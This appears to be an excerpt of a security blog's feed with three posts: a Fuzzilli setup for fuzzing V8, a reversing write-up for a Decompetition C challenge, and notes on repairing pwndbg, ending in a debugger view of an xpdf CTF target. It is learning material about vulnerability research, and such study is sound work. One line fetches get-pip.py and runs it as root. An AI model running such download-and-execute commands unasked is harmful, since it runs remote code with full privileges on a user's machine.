world</span><br></pre></td></tr></table></figure><h4 id="Fuzzilli"><a href="#Fuzzilli" class="headerlink" title="Fuzzilli"></a>Fuzzilli</h4><p>Finally, I used the latest version of fuzzilli to fuzz the latest version of v8, and reinstalled Swift as well.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/v8$ git checkout origin</span><br><span class="line">fr3y@ubuntu:~/v8$ gclient sync -D</span><br><span class="line">fr3y@ubuntu:~/v8$ ./fuzzbuild.sh</span><br><span class="line">fr3y@ubuntu:~/fuzzilli$ sudo sysctl -w <span class="string">'kernel.core_pattern=|/bin/false'</span></span><br><span class="line">fr3y@ubuntu:~/fuzzilli$ swift run FuzzilliCli --profile=v8 --storagePath=/home/fr3y/Desktop/crashes /home/fr3y/v8/out/fuzzbuild/d8</span><br></pre></td></tr></table></figure><p><strong>[Fuzzer] Let’s go!</strong></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">Fuzzer state: Fuzzing (with MutationEngine)</span><br><span class="line">Uptime: 0d 0h 30m 0s</span><br><span class="line">Total Samples: 12666</span><br><span class="line">Interesting Samples Found: 
1437</span><br><span class="line">Last Interesting Sample: 0d 0h 0m 4s</span><br><span class="line">Valid Samples Found: 8959</span><br><span class="line">Corpus Size: 1435</span><br><span class="line">Correctness Rate: 71.00% (overall: 70.73%)</span><br><span class="line">Timeout Rate: 1.90% (overall: 1.53%)</span><br><span class="line">Crashes Found: 0</span><br><span class="line">Timeouts Hit: 194</span><br><span class="line">Coverage: 7.88%</span><br><span class="line">Avg. program size: 48.27</span><br><span class="line">Avg. corpus program size: 11.28</span><br><span class="line">Avg. program execution time: 20ms</span><br><span class="line">Connected nodes: 0</span><br><span class="line">Execs / Second: 36.91</span><br><span class="line">Fuzzer Overhead: 18.61%</span><br><span class="line">Total Execs: 93155</span><br></pre></td></tr></table></figure><p>It is now difficult to discover new vulnerabilities using the default fuzzing approach. Going forward, it will be necessary to adjust the fuzzing strategy, input corpus, mutation rate, code coverage and other factors. </p>]]></content>
<summary type="html"><p><a href="https://github.com/antonio-morales/Fuzzing101/tree/main/Exercise%2010">https://github.com/antonio-morales/Fuzzing101/tree/main/Exercise%2010</a></p>
<p><strong>Note!!!</strong> Fuzzilli-0.9 is an unsuccessful attempt. It is recommended to start directly with the latest version of Fuzzilli (starting from the “Let’s Fuzz!” section).</p>
<p>System: Ubuntu 20.04 LTS</p></summary>
<category term="Security" scheme="https://f23y.github.io/categories/Security/"/>
<category term="fuzz" scheme="https://f23y.github.io/tags/fuzz/"/>
</entry>
<entry>
<title>Decompetition v2.0 baby-c writeup</title>
<link href="https://f23y.github.io/2022/02/17/Decompetition%20v2.0%20baby-c%20writeup/"/>
<id>https://f23y.github.io/2022/02/17/Decompetition%20v2.0%20baby-c%20writeup/</id>
<published>2022-02-17T02:26:55.000Z</published>
<updated>2025-09-27T10:58:47.823Z</updated>
<content type="html"><![CDATA[<p>A simple C reversing task from the 2022 reverse engineering competition. Given the author's limited ability, this writeup comes first; the others are still being figured out..</p><p>Contest site: <a href="https://decompetition.io/">https://decompetition.io/</a></p><p>GitHub: <a href="https://github.com/decompetition/challenges-2021">https://github.com/decompetition/challenges-2021</a></p><span id="more"></span><h3 id="baby-c"><a href="#baby-c" class="headerlink" title="baby-c"></a>baby-c</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span 
class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line">; This is the disassembly you're trying to reproduce.</span><br><span class="line">; It uses Intel syntax (mov dst, src).</span><br><span class="line"></span><br><span class="line">; Some initialisation: set a variable to 1.</span><br><span class="line">main:</span><br><span class="line"> endbr64</span><br><span class="line"> push rbp</span><br><span class="line"> mov rbp, rsp</span><br><span class="line"> push rbx</span><br><span class="line"> sub rsp, 0x18</span><br><span class="line"> mov [rbp-0x15], 1</span><br><span class="line">; Call getc, compare the input read with -1, and jump to block7 if equal.</span><br><span class="line">block1:</span><br><span class="line"> mov rax, [stdin]</span><br><span class="line"> mov rdi, rax</span><br><span class="line"> call getc@plt.sec</span><br><span class="line"> mov [rbp-0x14], eax</span><br><span class="line"> cmp [rbp-0x14], -1</span><br><span class="line"> je block7</span><br><span class="line">; Call __ctype_b_loc, keep the result in rax, and run a series of assignments on the input read.</span><br><span class="line">; Then AND eax with 0x2000, test eax, and jump to block4 if equal.</span><br><span class="line">block2:</span><br><span class="line"> call 
__ctype_b_loc@plt.sec</span><br><span class="line"> mov rax, [rax]</span><br><span class="line"> mov edx, [rbp-0x14]</span><br><span class="line"> movsxd rdx, edx</span><br><span class="line"> add rdx, rdx</span><br><span class="line"> add rax, rdx</span><br><span class="line"> movzx eax, [rax]</span><br><span class="line"> movzx eax, ax</span><br><span class="line"> and eax, 0x2000</span><br><span class="line"> test eax, eax </span><br><span class="line"> je block4</span><br><span class="line">; Here we see stdout and our earlier input: call putc, set a variable to 1, and jump to block1.</span><br><span class="line">block3:</span><br><span class="line"> mov rdx, [stdout]</span><br><span class="line"> mov eax, [rbp-0x14]</span><br><span class="line"> mov rsi, rdx</span><br><span class="line"> mov edi, eax</span><br><span class="line"> call putc@plt.sec</span><br><span class="line"> mov [rbp-0x15], 1</span><br><span class="line"> jmp block1</span><br><span class="line">; Compare a variable with 0 and jump to block6 if equal.</span><br><span class="line">block4:</span><br><span class="line"> cmp [rbp-0x15], 0</span><br><span class="line"> je block6</span><br><span class="line">; Call toupper, set a variable to 0, and jump to block1.</span><br><span class="line">block5:</span><br><span class="line"> mov rbx, [stdout]</span><br><span class="line"> mov eax, [rbp-0x14]</span><br><span class="line"> mov edi, eax</span><br><span class="line"> call toupper@plt.sec</span><br><span class="line"> mov rsi, rbx</span><br><span class="line"> mov edi, eax</span><br><span class="line"> call putc@plt.sec</span><br><span class="line"> mov [rbp-0x15], 0</span><br><span class="line"> jmp block1</span><br><span class="line">; Call tolower, then putc, and jump to block1.</span><br><span class="line">block6:</span><br><span class="line"> mov rbx, [stdout]</span><br><span class="line"> mov eax, [rbp-0x14]</span><br><span class="line"> mov edi, eax</span><br><span class="line"> call tolower@plt.sec</span><br><span class="line"> mov rsi, rbx</span><br><span class="line"> mov edi, eax</span><br><span 
class="line"> call putc@plt.sec</span><br><span class="line"> jmp block1</span><br><span class="line">; return 0</span><br><span class="line">block7:</span><br><span class="line"> mov eax, 0</span><br><span class="line"> add rsp, 0x18</span><br><span class="line"> pop rbx</span><br><span class="line"> pop rbp</span><br><span class="line"> ret</span><br></pre></td></tr></table></figure><p>After writing the comments it feels a bit better, and a sliver of hope for my reversing has been kindled.</p><p>Two variables are used in total: <code>[rbp-0x15]</code> and <code>[rbp-0x14]</code></p><p><strong>Background</strong>: the <code>__ctype_b_loc</code> function</p><p>This function is defined in the <a href="https://www.cnblogs.com/haomiao/p/6128459.html">ctype.h standard library</a>; see <a href="https://xuanxuanblingbling.github.io/ctf/pwn/2020/05/19/calc/">this article</a>.</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">v3 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"isalnum %d\n"</span>, (*v3)[s] & <span class="number">8</span>);</span><br><span class="line"> v4 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"isalpha %d\n"</span>, (*v4)[s] & <span 
class="number">0x400</span>);</span><br><span class="line"> v5 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"iscntrl %d\n"</span>, (*v5)[s] & <span class="number">2</span>);</span><br><span class="line"> v6 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"isdigit %d\n"</span>, (*v6)[s] & <span class="number">0x800</span>);</span><br><span class="line"> v7 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"isgraph %d\n"</span>, (*v7)[s] & <span class="number">0x8000</span>);</span><br><span class="line"> v8 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"islower %d\n"</span>, (*v8)[s] & <span class="number">0x200</span>);</span><br><span class="line"> v9 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"isprint %d\n"</span>, (*v9)[s] & <span class="number">0x4000</span>);</span><br><span class="line"> v10 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"ispunct %d\n"</span>, (*v10)[s] & <span class="number">4</span>);</span><br><span class="line"> v11 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"isspace %d\n"</span>, (*v11)[s] & <span class="number">0x2000</span>);</span><br><span class="line"> v12 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"isupper %d\n"</span>, (*v12)[s] & <span class="number">0x100</span>);</span><br><span class="line"> v13 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"isxdigit %d\n"</span>, (*v13)[s] & <span class="number">0x1000</span>);</span><br><span class="line"> v14 = __ctype_b_loc();</span><br><span 
class="line"> <span class="built_in">printf</span>(<span class="string">"isblank %d\n"</span>, (*v14)[s] & <span class="number">1</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br></pre></td></tr></table></figure><p>We can see that 0x2000 is isspace, so we can use it in the implementation.</p><p>Run it:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~$ ./baby-c</span><br><span class="line">abcd789uiuiuiu</span><br><span class="line">Abcd789uiuiuiu</span><br><span class="line">DE890absdUUUUU</span><br><span class="line">De890absduuuuu</span><br></pre></td></tr></table></figure><p>The program capitalises the first letter of each word and lower-cases the rest.</p><p>However, being useless, I just discovered that I can't write source code straight from the assembly, so I ran the given executable through IDA and tweaked the result a little.</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span 
class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><ctype.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">char</span> v7; </span><br><span class="line"> <span class="keyword">int</span> input; </span><br><span class="line"></span><br><span class="line"> v7 = <span class="number">1</span>;</span><br><span class="line"> <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line"> {</span><br><span class="line"> input = getc(<span class="built_in">stdin</span>);</span><br><span class="line"> <span class="keyword">if</span> ( input == <span class="number">-1</span> )</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">if</span> ( ((*__ctype_b_loc())[input] & <span class="number">0x2000</span>) != <span class="number">0</span> )</span><br><span class="line"> {</span><br><span class="line"> putc(input, <span class="built_in">stdout</span>);</span><br><span class="line"> v7 = <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( v7 )</span><br><span class="line"> {</span><br><span class="line"> putc(<span 
class="built_in">toupper</span>(input), <span class="built_in">stdout</span>);</span><br><span class="line"> v7 = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> putc(<span class="built_in">tolower</span>(input), <span class="built_in">stdout</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Result:</p><table><thead><tr><th>Source</th><th>Score</th><th>Weight</th><th>Total</th></tr></thead><tbody><tr><td>Test Cases</td><td>100%</td><td>20%</td><td>20%</td></tr><tr><td>ASM Diff</td><td>100%</td><td>60%</td><td>60%</td></tr><tr><td>Perfect Match Bonus</td><td>100%</td><td>20%</td><td>20%</td></tr><tr><td>Latest Submission</td><td></td><td></td><td>100%</td></tr></tbody></table><p>IDA is really impressive; I'm no match for IDA… T_T</p><p>I also tried Ghidra on this problem and found its output less clear than IDA's.. (</p><p>Here is the source for this challenge:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td 
class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><ctype.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">char</span> cap = <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span>(<span class="number">1</span>) {</span><br><span class="line"> <span class="keyword">int</span> c = getc(<span class="built_in">stdin</span>);</span><br><span class="line"> <span class="keyword">if</span>(c == EOF) <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="built_in">isspace</span>(c)) {</span><br><span class="line"> putc(c, <span class="built_in">stdout</span>);</span><br><span class="line"> cap = <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span>(cap) {</span><br><span class="line"> putc(<span class="built_in">toupper</span>(c), <span class="built_in">stdout</span>);</span><br><span class="line"> cap = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> putc(<span class="built_in">tolower</span>(c), <span class="built_in">stdout</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span 
class="line">}</span><br></pre></td></tr></table></figure><p>It really does use isspace…</p><p>I really am a reversing newbie...</p>]]></content>
<summary type="html"><p>A simple C reversing task from the 2022 reverse engineering competition. Given the author's limited ability, this writeup comes first; the others are still being figured out..</p>
<p>Contest site: <a href="https://decompetition.io/">https://decompetition.io/</a></p>
<p>GitHub: <a href="https://github.com/decompetition/challenges-2021">https://github.com/decompetition/challenges-2021</a></p></summary>
<category term="Security" scheme="https://f23y.github.io/categories/Security/"/>
<category term="reverse" scheme="https://f23y.github.io/tags/reverse/"/>
</entry>
<entry>
<title>The painful saga of fixing pwndbg</title>
<link href="https://f23y.github.io/2022/02/08/%E4%BF%AEpwndbg%E8%A1%80%E6%B3%AA%E5%8F%B2/"/>
<id>https://f23y.github.io/2022/02/08/%E4%BF%AEpwndbg%E8%A1%80%E6%B3%AA%E5%8F%B2/</id>
<published>2022-02-07T15:30:00.000Z</published>
<updated>2025-09-27T11:01:55.598Z</updated>
<content type="html"><![CDATA[<h2 id="前情提要"><a href="#前情提要" class="headerlink" title="前情提要"></a>Background</h2><p>When starting gdb I found that my pwndbg wouldn't load...</p><span id="more"></span><h3 id="import问题"><a href="#import问题" class="headerlink" title="import问题"></a>The import problem</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/root/.gdbinit:1: Error in sourced command file: Undefind command “import“.</span><br></pre></td></tr></table></figure><p>I adjusted the source line but it didn't help. After some searching, it was probably because two copies of gdb were installed at the same time (one built from source with make, one installed by apt), so gdbinit was being located wrongly. So I removed every gdb along with pwndbg and reinstalled them, but that still didn't help.</p><p>However, while installing pwndbg I noticed: python scripting is not supported in the copy of gdb.</p><p>So I tried building gdb with ./configure --with-python and then make. This worked.</p><h3 id="pip问题"><a href="#pip问题" class="headerlink" title="pip问题"></a>The pip problem</h3><p>Reinstalled pwndbg and found:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">ensurepip is disabled in Debian/Ubuntu for the system python.</span><br><span class="line">Python modules For the system python are usually handled by dpkg and apt-get.</span><br><span class="line"></span><br><span class="line"> apt-get install python-<module name></span><br><span class="line"></span><br><span class="line">Install the python-pip package to use pip itself. 
Using pip together</span><br><span class="line">with the system python might have unexpected results for any system installed</span><br><span class="line">module, so use it on your own risk, or make sure to only use it in virtual</span><br><span class="line">environments.</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>This pwndbg uses Python 2.7.</p><p>So here is the problem: newer apt no longer offers a pip package for Python 2.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/pwndbg$ sudo apt install python-pip</span><br><span class="line">Reading package lists... Done</span><br><span class="line">Building dependency tree </span><br><span class="line">Reading state information... 
Done</span><br><span class="line">Package python-pip is not available, but is referred to by another package.</span><br><span class="line">This may mean that the package is missing, has been obsoleted, or</span><br><span class="line">is only available from another source</span><br><span class="line">However the following packages replace it:</span><br><span class="line"> python3-pip</span><br><span class="line"></span><br><span class="line">E: Package 'python-pip' has no installation candidate</span><br></pre></td></tr></table></figure><p>Let's try installing it manually.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">wget https://bootstrap.pypa.io/pip/2.7/get-pip.py</span><br><span class="line">sudo python2 get-pip.py</span><br></pre></td></tr></table></figure><p>Install pwntools with python2.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo python2 -m pip install --upgrade pwntools</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/pwndbg$ python2 </span><br><span class="line">Python 2.7.18 (default, Mar 8 2021, 13:02:45) </span><br><span class="line">[GCC 9.3.0] on linux2</span><br><span class="line">Type "help", "copyright", "credits" or "license" for more information.</span><br><span class="line">>>> import pwn</span><br><span class="line">>>> pwn.asm('xor eax,eax')</span><br><span class="line">'1\xc0'</span><br><span class="line">>>> 
</span><br></pre></td></tr></table></figure><p>Reinstall pwndbg: sudo ./setup.sh</p><p>It prints + grep pwndbg /root/.gdbinit</p><p>It seems to have installed successfully..</p><p>However... it still doesn't work</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/pwndbg$ gdb -q</span><br><span class="line">Traceback (most recent call last):</span><br><span class="line"> File "/home/fr3y/pwndbg/gdbinit.py", line 24, in <module></span><br><span class="line"> import pwndbg # isort:skip</span><br><span class="line"> File "/home/fr3y/pwndbg/pwndbg/__init__.py", line 7, in <module></span><br><span class="line"> import pwndbg.android</span><br><span class="line"> File "/home/fr3y/pwndbg/pwndbg/android.py", line 5, in <module></span><br><span class="line"> import pwndbg.color.message as message</span><br><span class="line"> File "/home/fr3y/pwndbg/pwndbg/color/__init__.py", line 4, in <module></span><br><span class="line"> import pwndbg.memoize</span><br><span class="line"> File "/home/fr3y/pwndbg/pwndbg/memoize.py", line 42</span><br><span class="line"> print("Cannot memoize %r!", file=sys.stderr)</span><br><span class="line"> ^</span><br><span class="line">SyntaxError: invalid syntax</span><br><span class="line">(gdb) q</span><br></pre></td></tr></table></figure><p>That is Python 3 syntax...</p><p>Let me first go and build a gdb with Python 3.</p><h3 id="python3之路"><a href="#python3之路" class="headerlink" title="python3之路"></a>The road to Python 3</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./configure --with-python=/usr/bin/python3</span><br></pre></td></tr></table></figure><p>Then make, and let's check the Python version.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/gdb-11.2$ readelf -d $(which gdb) | grep python</span><br><span class="line"> 0x0000000000000001 (NEEDED) Shared library: [libpython3.8.so.1.0]</span><br></pre></td></tr></table></figure><p>Reinstall pwndbg and try running it.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/pwndbg$ gdb -q</span><br><span class="line">pwndbg: loaded 198 commands. Type pwndbg [filter] for a list.</span><br><span class="line">pwndbg: created $rebase, $ida gdb functions (can be used with print/break)</span><br><span class="line">pwndbg> q</span><br></pre></td></tr></table></figure><p>Success (tears)</p><p>Below is the debugging view for the rwctf2022 hso-groupie challenge (finally able to debug it):</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span 
class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">► 0x555555675150 mov rax, qword ptr [rdi + 0x48]</span><br><span class="line"> 0x555555675154 mov edx, dword ptr [rax + 0xc]</span><br><span class="line"> 0x555555675157 test edx, edx</span><br><span class="line"> 0x555555675159 jle 0x555555675190 <0x555555675190></span><br><span class="line"> </span><br><span class="line"> 0x55555567515b mov rax, qword ptr [rax]</span><br><span class="line"> 0x55555567515e sub edx, 1</span><br><span class="line"> 0x555555675161 lea rdx, [rax + rdx*8 + 8]</span><br><span class="line"> 0x555555675166 jmp 0x555555675179 <0x555555675179></span><br><span class="line"> ↓</span><br><span class="line"> 0x555555675179 mov r8, qword ptr [rax]</span><br><span class="line"> 0x55555567517c cmp dword ptr [r8 + 8], esi</span><br><span class="line"> 0x555555675180 jne 0x555555675170 <0x555555675170></span><br><span class="line">───────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────</span><br><span class="line">In file: /home/fr3y/hso-groupie/chall/xpdf-4.03/xpdf/JBIG2Stream.cc</span><br><span class="line"> 4035 </span><br><span class="line"> 4036 JBIG2Segment *JBIG2Stream::findSegment(Guint segNum) 
{</span><br><span class="line"> 4037 JBIG2Segment *seg;</span><br><span class="line"> 4038 int i;</span><br><span class="line"> 4039 </span><br><span class="line"> ► 4040 for (i = 0; i < globalSegments->getLength(); ++i) {</span><br><span class="line"> 4041 seg = (JBIG2Segment *)globalSegments->get(i);</span><br><span class="line"> 4042 if (seg->getSegNum() == segNum) {</span><br><span class="line"> 4043 return seg;</span><br><span class="line"> 4044 }</span><br><span class="line"> 4045 }</span><br><span class="line">───────────────────────────────────────────[ STACK ]────────────────────────────────────────────</span><br><span class="line">00:0000│ rsp 0x7fffffffdd08 —▸ 0x555555676c72 ◂— mov r12, rax</span><br><span class="line">01:0008│ 0x7fffffffdd10 ◂— 0x0</span><br><span class="line">02:0010│ 0x7fffffffdd18 ◂— 0x0</span><br><span class="line">03:0018│ 0x7fffffffdd20 —▸ 0x555561ec0ac0 ◂— 0x200000001</span><br><span class="line">04:0020│ 0x7fffffffdd28 —▸ 0x555561f40824 ◂— 0x207e100000000</span><br><span class="line">05:0028│ 0x7fffffffdd30 ◂— 0x0</span><br><span class="line">... 
